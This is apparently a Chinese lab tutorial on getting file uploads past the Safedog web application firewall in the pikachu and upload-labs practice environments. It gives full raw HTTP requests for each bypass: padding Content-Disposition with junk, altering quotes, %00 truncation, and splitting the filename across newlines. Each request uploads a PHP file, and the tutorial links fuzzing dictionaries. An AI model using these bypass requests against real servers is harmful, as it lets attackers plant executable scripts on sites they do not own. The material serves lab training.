上传waf绕过

上传WAF绕过 - 图1
上传参数名解析：明确有哪些东西能修改？

Content-Disposition:  一般可更改
name: 表单参数值，不能更改
filename :文件名，可以更改
Content-Type:文件MIME，视情况更改

常见的绕过方法

数据溢出-防匹配(xxx.. .)
符号变异-防匹配（'" ;)
数据截断-防匹配(%00 ;换行)
重复数据-防匹配(参数多次)

pikachu+安全狗绕过

https://www.cnblogs.com/shley/p/14800623.html

数据溢出

上传WAF绕过 - 图2
正常上传的情况

上传WAF绕过 - 图3
被安全狗拦截的情况

上传WAF绕过 - 图4
修改数据包上传Content-Disposition: form-data; name=”uploadfile”;中间插入大量的垃圾数据从而绕过。

上传WAF绕过 - 图5

%00截断

使用%00截断，添加合法后缀名格式：文件名.php%00.png

上传WAF绕过 - 图6

改变符号

去掉双引号

POST /vul/unsafeupload/servercheck.php HTTP/1.1
Host: 10.1.1.6:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------276594773132894662704244861418
Content-Length: 367
Origin: http://10.1.1.6:88
Connection: close
Referer: http://10.1.1.6:88/vul/unsafeupload/servercheck.php
Cookie: PHPSESSID=e405r8e634hhjk7su64ofmjknl
Upgrade-Insecure-Requests: 1
-----------------------------276594773132894662704244861418
Content-Disposition: form-data;name="uploadfile"; filename=info4.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------276594773132894662704244861418
Content-Disposition: form-data; name="submit"
å¼å§ä¸ä¼ 
-----------------------------276594773132894662704244861418--

上传WAF绕过 - 图7
只使用一个双引号，成功上传文件info5.php

POST /vul/unsafeupload/servercheck.php HTTP/1.1
Host: 10.1.1.6:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------276594773132894662704244861418
Content-Length: 368
Origin: http://10.1.1.6:88
Connection: close
Referer: http://10.1.1.6:88/vul/unsafeupload/servercheck.php
Cookie: PHPSESSID=e405r8e634hhjk7su64ofmjknl
Upgrade-Insecure-Requests: 1
-----------------------------276594773132894662704244861418
Content-Disposition: form-data;name="uploadfile"; filename="info5.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------276594773132894662704244861418
Content-Disposition: form-data; name="submit"
å¼å§ä¸ä¼ 
-----------------------------276594773132894662704244861418--

上传WAF绕过 - 图8

uploads+安全狗绕过

数据溢出

POST /Pass-06/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------219208409912899756444268510117
Content-Length: 378
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-06/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------219208409912899756444268510117
Content-Disposition: form-data; name="upload_file";填充大量的垃圾数据; filename="info.Php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
-----------------------------219208409912899756444268510117
Content-Disposition: form-data; name="submit"
涓婁紶
-----------------------------219208409912899756444268510117--

上传WAF绕过 - 图9

改变符号

POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 363
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename="info.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
涓婁紶
-----------------------------156187617541967037312717027348--

上传WAF绕过 - 图10

POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 362
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename=info.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
涓婁紶
-----------------------------156187617541967037312717027348--

上传WAF绕过 - 图11

%00截断

POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 371
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename="info.php%00.png"
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
涓婁紶
-----------------------------156187617541967037312717027348--

上传WAF绕过 - 图12

换行执行

POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 368
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename="x.
p
h
p"
Content-Type:  image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
涓婁紶
-----------------------------156187617541967037312717027348--

上传WAF绕过 - 图13

上传WAF绕过 - 图14
fuzz字典
https://github.com/fuzzdbproject/fuzzdb
https://github.com/TheKingOfDuck/fuzzDicts
https://github.com/TuuuNya/fuzz_dict
https://github.com/jas502n/fuzz-wooyun-org

上传WAF绕过 - 图15

上传WAF绕过 - 图16

上传WAF绕过 - 图17

上传WAF绕过 - 图18